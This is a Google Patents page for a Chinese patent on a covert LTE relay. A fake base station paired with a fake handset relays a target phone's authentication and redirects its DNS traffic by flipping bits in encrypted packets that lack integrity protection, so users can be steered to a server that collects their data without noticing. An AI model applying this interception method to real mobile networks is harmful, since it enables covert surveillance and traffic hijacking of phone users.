CN110557753B - DNS redirection method based on relay access for public security network access - Google Patents
DNS redirection method based on relay access for public security network access Download PDFInfo
- Publication number
- CN110557753B CN110557753B CN201910744712.7A CN201910744712A CN110557753B CN 110557753 B CN110557753 B CN 110557753B CN 201910744712 A CN201910744712 A CN 201910744712A CN 110557753 B CN110557753 B CN 110557753B
- Authority
- CN
- China
- Prior art keywords
- private network
- network
- enb
- public network
- message
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000000034 method Methods 0.000 title claims abstract description 28
- 230000005540 biological transmission Effects 0.000 claims abstract description 19
- 230000004048 modification Effects 0.000 claims abstract description 18
- 238000012986 modification Methods 0.000 claims abstract description 18
- 238000004891 communication Methods 0.000 claims abstract description 12
- 230000004044 response Effects 0.000 claims description 13
- 230000008569 process Effects 0.000 claims description 10
- 230000004913 activation Effects 0.000 claims description 4
- 239000000284 extract Substances 0.000 claims description 3
- 230000001360 synchronised effect Effects 0.000 claims description 2
- 238000011835 investigation Methods 0.000 abstract 1
- 108091005487 SCARB1 Proteins 0.000 description 5
- 102100037118 Scavenger receptor class B member 1 Human genes 0.000 description 5
- 101100396152 Arabidopsis thaliana IAA19 gene Proteins 0.000 description 4
- 102100039292 Cbp/p300-interacting transactivator 1 Human genes 0.000 description 4
- 101000888413 Homo sapiens Cbp/p300-interacting transactivator 1 Proteins 0.000 description 4
- 101100274486 Mus musculus Cited2 gene Proteins 0.000 description 4
- 101150096622 Smr2 gene Proteins 0.000 description 4
- 230000002457 bidirectional effect Effects 0.000 description 2
- 238000001514 detection method Methods 0.000 description 2
- 238000013468 resource allocation Methods 0.000 description 2
- 101001055444 Homo sapiens Mediator of RNA polymerase II transcription subunit 20 Proteins 0.000 description 1
- 102100026165 Mediator of RNA polymerase II transcription subunit 20 Human genes 0.000 description 1
- 230000002159 abnormal effect Effects 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 230000008859 change Effects 0.000 description 1
- 238000009795 derivation Methods 0.000 description 1
- 238000010586 diagram Methods 0.000 description 1
- 230000000694 effects Effects 0.000 description 1
- 238000005516 engineering process Methods 0.000 description 1
- 230000003340 mental effect Effects 0.000 description 1
- 230000001960 triggered effect Effects 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/09—Mapping addresses
- H04L61/25—Mapping addresses of the same type
- H04L61/2503—Translation of Internet protocol [IP] addresses
- H04L61/256—NAT traversal
- H04L61/2589—NAT traversal over a relay server, e.g. traversal using relay for network address translation [TURN]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W12/00—Security arrangements; Authentication; Protecting privacy or anonymity
- H04W12/06—Authentication
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W12/00—Security arrangements; Authentication; Protecting privacy or anonymity
- H04W12/40—Security arrangements using identity modules
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W16/00—Network planning, e.g. coverage or traffic planning tools; Network deployment, e.g. resource partitioning or cells structures
- H04W16/24—Cell structures
- H04W16/26—Cell enhancers or enhancement, e.g. for tunnels, building shadow
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W40/00—Communication routing or communication path finding
- H04W40/02—Communication route or path selection, e.g. power-based or shortest path routing
- H04W40/22—Communication route or path selection, e.g. power-based or shortest path routing using selective relaying for reaching a BTS [Base Transceiver Station] or an access point
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W48/00—Access restriction; Network selection; Access point selection
- H04W48/16—Discovering, processing access restriction or access information
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W74/00—Wireless channel access
- H04W74/002—Transmission of channel access control information
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W76/00—Connection management
- H04W76/10—Connection setup
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04W—WIRELESS COMMUNICATION NETWORKS
- H04W88/00—Devices specially adapted for wireless communication networks, e.g. terminals, base stations or access point devices
- H04W88/02—Terminal devices
- H04W88/04—Terminal devices adapted for relaying to or from another terminal or user
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/70—Reducing energy consumption in communication networks in wireless communication networks
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Mobile Radio Communication Systems (AREA)
Abstract
The invention relates to the technical field of communication, in particular to a DNS redirection method based on relay access for public security network communication, which comprises the following steps: and the establishment of the initial attachment connection of the public network UE and the private network UE is completed, the private network UE completes authentication relay access, and DNS redirection is carried out on transmission data modification. The invention can effectively solve the problems of complex DNS redirection operation, easy investigation and discovery and low success rate in the prior art.
Description
Technical Field
The invention relates to the technical field of communication, in particular to a DNS redirection method based on relay access for public security network communication.
Background
The public security network communication field has special requirements for acquisition of user identity information, and the method for carrying out user analysis and tracking by utilizing mobile phone terminal information based on the LTE electronic fence has great value. In the prior art, the terminal equipment is subjected to TAU (Tracking Area Update) process by setting an abnormal TAC (Tracking Area Code), the terminal equipment is modified in the complete TAU flow, NAS information of the Identity Request is issued after the RRC connection is completed, values of Security header type and Identity reqUEst message Identity in the Identity Request are set to enable the terminal to report the IMSI code of the terminal equipment, and then the TAU flow is refused, so that bidirectional authentication is avoided, and the terminal is connected back to the original service cell. The IMSI is used as a unique identity of the SIM card, and has important value for user information acquisition. In some special usage scenarios, it may be far from sufficient to obtain basic identity information, in addition to the IMSI, some other identity information may be needed, such as: data, telephone, short messages, etc., so DNS redirection techniques are now commonly utilized.
In the existing DNS redirection technology, the local DNS setting is modified by implanting software, so that the DNS requested by a user is redirected to a set target DNS server; or a background code is implanted through the webpage, and when a user clicks the webpage, the local DNS setting is modified, so that the effect is the same; or the original DNS settings of the router are overridden with a firmware vulnerability of the router, thereby affecting all users connected to the router, redirecting it to the target DNS.
In the practical use process, the following problems can occur: when data transmission is carried out, especially when DNS redirection is carried out, the data transmission is triggered in a passive mode, the address of a DNS server of a user is modified through a webpage or a software background implanted code, the user is required to actively click on the webpage or install software, the mode is easy to perceive and find, the success rate is low, and the router connected with the user is difficult to locate and acquire by using the original DNS setting method of the overlay router.
Disclosure of Invention
In order to solve the technical problems, the invention provides a DNS redirection method based on relay access for public security network access, which can effectively solve the problems of complex DNS redirection operation, easiness in detection and discovery and low success rate in the prior art.
The invention is realized by adopting the following technical scheme:
the DNS redirection method based on relay access for public security network communication is characterized in that: respectively establishing information communication connection between public network UE and private network eNB, private network eNB and private network UE and between private network UE and public network eNB, so that initial attachment connection establishment of the public network UE and the private network UE is completed, authentication relay access is completed by the private network UE, and DNS redirection is carried out on transmission data modification; wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits the IP message to the private network eNB, and the private network eNB locates the DNS data packet after receiving the message and bypasses encryption and modification of the message data;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
The bypass encryption modified message data specifically refers to: the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and the encryption and decryption are completed through exclusive OR operation.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is started, the physical downlink channel is synchronized to start searching the cell, whether the signal quality of the cell meets the requirement is judged, a proper cell is selected, and then the cell is resided and an attachment flow is carried out;
(2) the public network UE initiates random access request information, and after the private network eNB detects the information, the private network eNB sends a random access response message to the public network UE;
(3) after receiving the random access response message, the public network UE adjusts the uplink sending time according to the tracking area in the message and sends a radio resource control connection request message to the private network eNB;
(4) the private network eNB sends information for establishing radio resource bearing and information for configuring radio resources to public network UE;
(5) and the public network UE completes the radio resource bearing and the radio resource configuration and sends a radio resource control connection completion message to the private network eNB.
The private network UE completes the radio resource bearing and the radio resource configuration with the public network eNB by the same flow as the initial attachment connection of the public network UE.
The radio resource control connection completion message includes attachment request information of the non-access stratum.
The private network UE completes authentication relay access specifically comprises the following steps:
the private network eNB sends the attachment request information sent by the public network UE to the public network eNB to the MME through the private network UE to start an authentication process, wherein the attachment request information comprises the IMSI and the authentication request information;
ii, the MME reports the authentication request information to the HSS, and the HSS verifies the validity of the IMSI by inquiring the database of the HSS and generates an authentication vector set AV to be sent to the MME;
iii, the MME extracts data such as random number RAND, authentication token AUTN, root key KASME and the like from the AV, and simultaneously distributes a key identification KSIASME for the root key KASME, and the MME issues a user authentication request with the data such as random number RAND, authentication token AUTN, root key KASME and the like to the private network UE;
and iv, forwarding the data of the user authentication request to the public network UE through the private network eNB, calculating an expected message authentication code XMAC by the public network UE through extracting and calculating information such as the message authentication code MAC in the authentication token AUTN, comparing whether the expected message authentication code XMAC is equal to the message authentication code MAC, checking whether the sequence number SQN is in a normal range or not at the same time, authenticating the accessed network, and uploading the calculated RES as authentication response to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish the authentication process.
Before DNS redirection of the transmission data modification, further comprises:
i MME requests to establish default bearer by sending an initial context setting request message to a public network eNB;
after receiving the initial context setting request message, detecting that if the initial context setting request message does not contain the capability information of the public network UE, the public network eNB issues a message to the private network UE in sequence to inquire the capability of the public network UE, and after the private network UE inquires the capability information of the public network UE through the private network eNB, the private network UE sends the message to the public network eNB to report the capability information of the public network UE;
III, the public network eNB sends a security mode starting message to the private network UE according to security information supported by the public network UE, and security activation is carried out; the private network UE sends a security mode completion message to the public network eNB;
IV, the public network eNB sends radio resource connection reconfiguration information to the private network UE to carry out UE resource reconfiguration;
and V, after the reconfiguration is finished, the private network UE returns a configuration success message to the public network eNB to finish the access flow.
Compared with the prior art, the invention has the beneficial effects that:
1. the invention sets a relay node in the public network UE and the public network eNB, and the relay node forwards the message once or a plurality of times, thereby realizing relay access to acquire more terminal identity information and solving the problem of bidirectional authentication flow which cannot be performed because the key cannot be acquired. Meanwhile, the relay node is divided into two parts, namely private network UE and private network eNB, and the functions are decoupled, so that the functions are not interfered with each other, and the expansion of a subsequent module is easier. And during the use, can be with private network eNB fixed position, and private network UE is small, can hand-carry the removal, and convenient information and parameter change are received, and can be more convenient to private network UE function add-drop etc..
When the DNS redirection is carried out on the transmission data, the private network UE and the private network eNB are utilized, so that the public network UE can directly modify the IP data packet when the public network UE is distributed in the network, the active triggering is realized, the user is not required to execute any operation, the detection and the discovery are not easy, and the success rate is higher. DNS redirection is carried out through relay access, so that users can be induced to the recently deployed HTTP server for user information collection.
2. The sender and the receiver both use the same encryption algorithm to generate a key Key stream, encryption and decryption are completed through exclusive OR operation, the original ciphertext can be modified into the required ciphertext through a specific mask, the operation and the operation are simple, and the efficiency of modifying the message data is improved.
Because the PDCD (packet data convergence protocol) layer only turns on the encryption mode without integrity protection, the IP data message is modified by bypassing the encryption algorithm to realize DNS redirection
3. The public network UE is connected with the private network eNB, the public network eNB is connected with the private network UE, the private network UE and the private network eNB serve as relay nodes to proxy the public network UE to access the public network core, the encryption key is not required to be acquired, the encryption algorithm is cracked, the proxy UE can be accessed to the core network, and therefore relevant information of data acquisition is intercepted in subsequent data transmission.
Drawings
The invention will be described in further detail with reference to the drawings and detailed description, wherein:
FIG. 1 is a schematic view of the overall structure of the present invention;
fig. 2 is a schematic diagram of a relay access procedure according to the present invention;
Detailed Description
Example 1
As a basic embodiment of the present invention, referring to fig. 1 of the specification, the present invention includes a DNS redirection method based on relay access for public security network access, where information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
Wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits an IP message to the private network eNB, the private network eNB locates the DNS data packet after receiving the message, bypasses encryption and modifies the message data, the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and encryption and decryption are completed through exclusive OR operation;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
The public network UE is a user terminal which needs to acquire related identity information; the public network eNB is a base station of a conventional operator; the private network eNB is a base station for enabling the public network UE to relay access; the private network UE is a terminal for simulating the public network UE to access the base station of the operator.
Example 2
As a preferred embodiment of the present invention, the present invention includes a DNS redirection method based on relay access for public security network access, in which information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is started, PLMN (public land mobile network) selection is firstly carried out, then physical downlink channel synchronization is carried out to start searching cells, and the searching order is same-frequency cells, different-frequency cells and different-system cells under the system in sequence; the public network UE still needs to judge whether the signal quality of the cell meets the requirement, determine whether the cell can be resided in, select a proper cell according to the rule of cell selection, and then resided in and carry out the attaching flow;
(2) the public network UE performs an attachment process, and firstly initiates random access request information, namely MSG1 information; after detecting the MSG1 message, the private network eNB sends a random access response message, namely an MSG2 message, to the public network UE;
(3) after receiving the random access response, the public network UE adjusts the uplink transmission opportunity according to the tracking area in MSG2, and sends an RRCConnectionReqUEst (radio resource control connection request) message to the private network eNB.
(4) The private network eNB sends a radio resource control connection request message to public network UE, wherein the message comprises SRB1 (radio resource bearer) bearer establishment information and radio resource configuration information;
(5) the public network UE completes SRB1 bearer and radio resource configuration, and sends an rrcconnectionsetup complete message containing Attach reqUEst information of the non-access stratum to the private network eNB.
And (3) the private network UE repeats the flow of (1) - (5) and completes the radio resource bearing and the radio resource allocation with the public network eNB.
Wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits an IP message to the private network eNB, the private network eNB locates the DNS data packet after receiving the message, bypasses encryption and modifies the message data, the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and encryption and decryption are completed through exclusive OR operation;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
Example 3
As an optimal implementation manner of the present invention, referring to fig. 2 of the specification, the present invention includes a DNS redirection method based on relay access for public security network access, in which information communication connection is respectively established between public network UE and private network eNB, private network eNB and private network UE, and private network UE and public network eNB, so that initial attachment connection establishment between public network UE and private network UE is completed, private network UE completes authentication relay access, and DNS redirection is performed for transmission data modification.
The initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is started, PLMN (public land mobile network) selection is firstly carried out, then physical downlink channel synchronization is carried out to start searching cells, and the searching order is same-frequency cells, different-frequency cells and different-system cells under the system in sequence; the public network UE still needs to judge whether the signal quality of the cell meets the requirement, determine whether the cell can be resided in, select a proper cell according to the rule of cell selection, and then resided in and carry out the attaching flow;
(2) the public network UE performs an attachment process, and firstly initiates random access request information, namely MSG1 information; after detecting the MSG1 message, the private network eNB sends a random access response message, namely an MSG2 message, to the public network UE;
(3) after receiving the random access response, the public network UE adjusts the uplink transmission opportunity according to the tracking area in MSG2, and sends an RRCConnectionReqUEst (radio resource control connection request) message to the private network eNB.
(4) The private network eNB sends a radio resource control connection request message to public network UE, wherein the message comprises SRB1 (radio resource bearer) bearer establishment information and radio resource configuration information;
(5) the public network UE completes SRB1 bearer and radio resource configuration, and sends an rrcconnectionsetup complete message containing Attach reqUEst information of the non-access stratum to the private network eNB.
The initial attachment connection establishment of the private network UE specifically comprises the following steps: and (3) the private network UE repeats the flow of (1) - (5) and completes the radio resource bearing and the radio resource allocation with the public network eNB.
The private network UE completes authentication relay access specifically comprises the following steps:
the private network eNB sends an Attach reqUEst (attachment reqUEst information) sent by the public network UE to the public network eNB through the private network UE until the public network MME starts an authentication process, wherein the attachment reqUEst information comprises an IMSI and authentication reqUEst information;
ii, the public network MME reports the authentication request information to the public network HSS, and the public network HSS verifies the validity of the IMSI by inquiring the database of the public network HSS and generates an authentication vector group AV and sends the authentication vector group AV to the public network MME;
iii, the public network MME extracts data such as random number RAND, authentication token AUTN, root key KASME and the like from the AV, and simultaneously distributes a key identification KSIASME for the root key KASME, and the public network MME issues a user authentication request with the data such as random number RAND, authentication token AUTN, root key KASME and the like to the private network UE;
iv the private network UE transmits the data of the user authentication request to the public network UE through the private network eNB, the public network UE calculates an expected message authentication code XMAC by extracting and calculating information such as the message authentication code MAC in the authentication token AUTN, compares whether the expected message authentication code XMAC is equal to the message authentication code MAC, simultaneously checks whether the sequence number SQN is in a normal range or not, is used for authenticating the accessed network, and the calculated RES is used as authentication response to be uploaded to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish the authentication process;
v. the public network MME requests to establish a default bearer by sending INITIAL CONTEXT SETUP REQUEST (initial context setup request) message to the public network eNB, wherein the default bearer includes Attach Accept message of non-access stratum (NAS) and Activatedefault EPS bearer conteXt reqUEst (activate core network context default bearer) message;
vi after receiving the initial context setting request message, detecting that if the initial context setting request message does not contain the capability information of the public network UE, the public network eNB issues a message to the private network UE in sequence to inquire the capability of the public network UE, and after the private network UE inquires the capability information of the public network UE through the private network eNB, the private network UE sends the message to the public network eNB to report the capability information of the public network UE;
vii, the public network eNB sends a security modeCommand message to the private network UE according to the security information supported by the public network UE, so as to perform security activation, and the private network UE returns a security modeCommand message to the public network eNB after the security activation is completed;
viii public network eNB sends RRCConnectionReconfiguration message to private network UE to perform UE resource reconfiguration, including reconfiguration SRB1 (radio resource bearer) and radio resource configuration, establishing SRB2, DRB (including default bearer), etc. After the completion, the private network UE returns a configuration success message to the public network eNB to complete the access flow.
Wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits an IP message to the private network eNB, the private network eNB locates the DNS data packet after receiving the message and bypasses encryption and modification of the message data, the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and encryption and decryption are completed through exclusive OR operation.
Assuming that the transmitted plaintext is m and the encrypted ciphertext is c, encrypting is as follows: keyStream XOR m=c, decrypt as: keyStream XOR c=m. When the message data is modified, a specific mask is used for carrying out exclusive or on the ciphertext c to obtain a ciphertext c ', and the ciphertext c ' is decrypted to obtain a plaintext m '.
The formula is described as: mask XOR c=c '; keyStream XOR c ' =m '; obtained by simple derivation:
KeyStream XOR c’ XOR m = m’ XOR m;
KeyStream XOR c’ XOR (KeyStream XOR c)=m’ XOR m;
KeyStream XOR (mask XOR c) XOR (KeyStream XOR c)=m’ XOR m;
mask=m’ XOR m;
i.e. the required mask is the exclusive or of the original plaintext and the modified message data. For mobile data networks, DNS in the same area by the same operator is generally very fixed and is easily available, so that the plaintext of a DNS data packet can be approximately guessed. The DNS redirection is accomplished by only modifying the IP address in the DNS request, which is fixed at the offset in the packet, so that the modified location can be easily found.
The DNS request data packet needs to be positioned in the transmitted data packet, and the length of the DNS data packet and the length of other frames are found to have very obvious distinguishing degree through statistics, so that the data packet which is suspected of being requested by the DNS is modified, whether a request response exists in the follow-up sequence is observed, and if the response is received, the modified position is correct.
b. The private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. and the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized.
In view of the foregoing, it will be appreciated by those skilled in the art that, after reading the present specification, various other modifications can be made in accordance with the technical scheme and concepts of the present invention without the need for creative mental efforts, and the modifications are within the scope of the present invention.
Claims (5)
1. The DNS redirection method based on relay access for public security network communication is characterized in that: respectively establishing information communication connection between public network UE and private network eNB, private network eNB and private network UE and between private network UE and public network eNB, so that initial attachment connection establishment of the public network UE and the private network UE is completed, authentication relay access is completed by the private network UE, and DNS redirection is carried out on transmission data modification; wherein DNS redirection of the transmission data modification specifically comprises:
a. the public network UE transmits the IP message to the private network eNB, and the private network eNB locates the DNS data packet after receiving the message and bypasses encryption and modification of the message data;
b. the private network eNB sends the modified IP message data to the private network UE, the private network UE reports the request to the public network eNB, the private network eNB accesses the Internet through the core network, locates to the modified DNS server, resolves the IP address and returns to the private network eNB;
c. the private network eNB forwards the IP address to the public network UE, and the public network UE accesses the target HTTP server through the IP address, so that DNS redirection is realized;
the step a of bypassing the encryption and modifying message data specifically refers to: the sender and the receiver both use the same encryption algorithm to generate a key Key stream, and encryption and decryption are completed through exclusive OR operation;
before DNS redirection of the transmission data modification, further comprises:
i MME requests to establish default bearer by sending an initial context setting request message to a public network eNB;
after receiving the initial context setting request message, detecting that if the initial context setting request message does not contain the capability information of the public network UE, the public network eNB issues a message to the private network UE in sequence to inquire the capability of the public network UE, and after the private network UE inquires the capability information of the public network UE through the private network eNB, the private network UE sends the message to the public network eNB to report the capability information of the public network UE;
III, the public network eNB sends a security mode starting message to the private network UE according to security information supported by the public network UE, and security activation is carried out; the private network UE sends a security mode completion message to the public network eNB;
IV, the public network eNB sends radio resource connection reconfiguration information to the private network UE to carry out UE resource reconfiguration;
and V, after the reconfiguration is finished, the private network UE returns a configuration success message to the public network eNB to finish the access flow.
2. A DNS redirection method based on relay access for public security network traffic according to claim 1, wherein: the initial attachment connection establishment of the public network UE specifically comprises the following steps:
(1) after the public network UE is started, the physical downlink channel is synchronized to start searching the cell, whether the signal quality of the cell meets the requirement is judged, a proper cell is selected, and then the cell is resided and an attachment flow is carried out;
(2) the public network UE initiates random access request information, and after the private network eNB detects the information, the private network eNB sends a random access response message to the public network UE;
(3) after receiving the random access response message, the public network UE adjusts the uplink sending time according to the tracking area in the message and sends a radio resource control connection request message to the private network eNB;
(4) the private network eNB sends information for establishing radio resource bearing and information for configuring radio resources to public network UE;
(5) and the public network UE completes the radio resource bearing and the radio resource configuration and sends a radio resource control connection completion message to the private network eNB.
3. A DNS redirection method based on relay access for public security network access according to claim 2, characterized in that: the private network UE completes the radio resource bearing and the radio resource configuration with the public network eNB by the same flow as the initial attachment connection of the public network UE.
4. A DNS redirection method based on relay access for public security network traffic according to claim 3, characterized in that: the radio resource control connection completion message includes attachment request information of the non-access stratum.
5. The DNS redirection method based on relay access for public security network access according to claim 4, wherein: the private network UE completes authentication relay access specifically comprises the following steps:
the private network eNB sends the attachment request information sent by the public network UE to the public network eNB to the MME through the private network UE to start an authentication process, wherein the attachment request information comprises the IMSI and the authentication request information;
ii, the MME reports the authentication request information to the HSS, and the HSS verifies the validity of the IMSI by inquiring the database of the HSS and generates an authentication vector set AV to be sent to the MME;
iii, the MME extracts random number RAND, authentication token AUTN and root key KASME data from the AV, and simultaneously distributes a key identification KSIASME for the root key KASME, and the MME issues a user authentication request with the random number RAND, the authentication token AUTN and the root key KASME data to the private network UE;
and iv, forwarding the data of the user authentication request to the public network UE through the private network eNB, and the public network UE calculates an expected message authentication code XMAC by extracting and calculating message authentication code MAC information in an authentication token AUTN, compares whether the expected message authentication code XMAC is equal to the message authentication code MAC, simultaneously checks whether a sequence number SQN is in a normal range or not, is used for authenticating an accessed network, and uploads the calculated RES as an authentication response to the MME through the private network eNB, the private network UE and the public network eNB in sequence to finish an authentication process.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201910744712.7A CN110557753B (en) | 2019-08-13 | 2019-08-13 | DNS redirection method based on relay access for public security network access |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201910744712.7A CN110557753B (en) | 2019-08-13 | 2019-08-13 | DNS redirection method based on relay access for public security network access |
Publications (2)
Publication Number | Publication Date |
---|---|
CN110557753A CN110557753A (en) | 2019-12-10 |
CN110557753B true CN110557753B (en) | 2023-05-09 |
Family
ID=68737424
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201910744712.7A Active CN110557753B (en) | 2019-08-13 | 2019-08-13 | DNS redirection method based on relay access for public security network access |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN110557753B (en) |
Families Citing this family (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US11729137B2 (en) | 2021-02-18 | 2023-08-15 | Samsung Electronics Co., Ltd. | Method and device for edge application server discovery |
Citations (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103237342A (en) * | 2013-04-28 | 2013-08-07 | 哈尔滨工业大学 | Cross identity registration method for co-group users of time division-long term evolution-based (TD-LTE-based) public network and cluster |
CN109561430A (en) * | 2017-09-26 | 2019-04-02 | 大唐移动通信设备有限公司 | A kind of implementation method and equipment of public network user access private network |
Family Cites Families (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103152444B (en) * | 2013-03-25 | 2016-08-03 | 华为技术有限公司 | The network address translation of trunking scheme and message transmitting method and device, system |
CN103825969A (en) * | 2013-10-29 | 2014-05-28 | 电子科技大学 | DNS query method based on anonymous network |
CN105376851B (en) * | 2014-08-29 | 2019-06-11 | 中国电信股份有限公司 | A kind of network attached method and system |
CN106034300A (en) * | 2015-03-11 | 2016-10-19 | 普天信息技术有限公司 | Authentication connection method based on TD-LTE wireless communication network and base station |
CN107613037B (en) * | 2017-09-14 | 2021-11-12 | 山东中网云安智能科技有限公司 | Domain name redirection method and system |
-
2019
- 2019-08-13 CN CN201910744712.7A patent/CN110557753B/en active Active
Patent Citations (2)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103237342A (en) * | 2013-04-28 | 2013-08-07 | 哈尔滨工业大学 | Cross identity registration method for co-group users of time division-long term evolution-based (TD-LTE-based) public network and cluster |
CN109561430A (en) * | 2017-09-26 | 2019-04-02 | 大唐移动通信设备有限公司 | A kind of implementation method and equipment of public network user access private network |
Also Published As
Publication number | Publication date |
---|---|
CN110557753A (en) | 2019-12-10 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US10932132B1 (en) | Efficient authentication and secure communications in private communication systems having non-3GPP and 3GPP access | |
US11856402B2 (en) | Identity-based message integrity protection and verification for wireless communication | |
US20210211296A1 (en) | Authentication Mechanism for 5G Technologies | |
US9445443B2 (en) | Network based provisioning of UE credentials for non-operator wireless deployments | |
US10694376B2 (en) | Network authentication method, network device, terminal device, and storage medium | |
EP2547134A1 (en) | Improved subscriber authentication for unlicensed mobile access signaling | |
KR20180119651A (en) | Authentication mechanisms for 5G technologies | |
CN109964498A (en) | The method and apparatus that remote unit is attached to mobile core network via independent insincere non-3GPP access network | |
EP2845362A1 (en) | Secure communications for computing devices utilizing proximity services | |
EP2979418B1 (en) | Method to establish a secure voice communication using generic bootstrapping architecture | |
CN112087724A (en) | Communication method, network equipment, user equipment and access network equipment | |
US20210111902A1 (en) | System information protection at a network function in the core network | |
CN104581710A (en) | Method and system for securely transmitting IMSI of LTE user on idle port | |
US20230397000A1 (en) | Handling application functions for key management in communication device-network relay scenarios | |
Baskaran et al. | A lightweight incognito key exchange mechanism for LTE-A assisted D2D communication | |
CN110557753B (en) | DNS redirection method based on relay access for public security network access | |
EP2790377B1 (en) | Apparatus and methods for key generation | |
EP4106376A1 (en) | A method and system for authenticating a base station | |
US20230171585A1 (en) | Device-to-Device Secure Embedded Subscriber Identity Module Subscription Transfer | |
KR101434750B1 (en) | Geography-based pre-authentication for wlan data offloading in umts-wlan networks | |
US12207085B2 (en) | Method and system for authenticating a base station | |
KR101780401B1 (en) | Method and apparatus for setting of authorazation and security in radio communication system | |
US20240236663A9 (en) | Systems and methods for authorization of proximity based services | |
CN118402262A (en) | Method and equipment for relaying communication | |
CN117203935A (en) | Method and apparatus for setup, authentication, authorization, and User Equipment (UE) key generation and distribution in an on-demand network |
Legal Events
Date | Code | Title | Description |
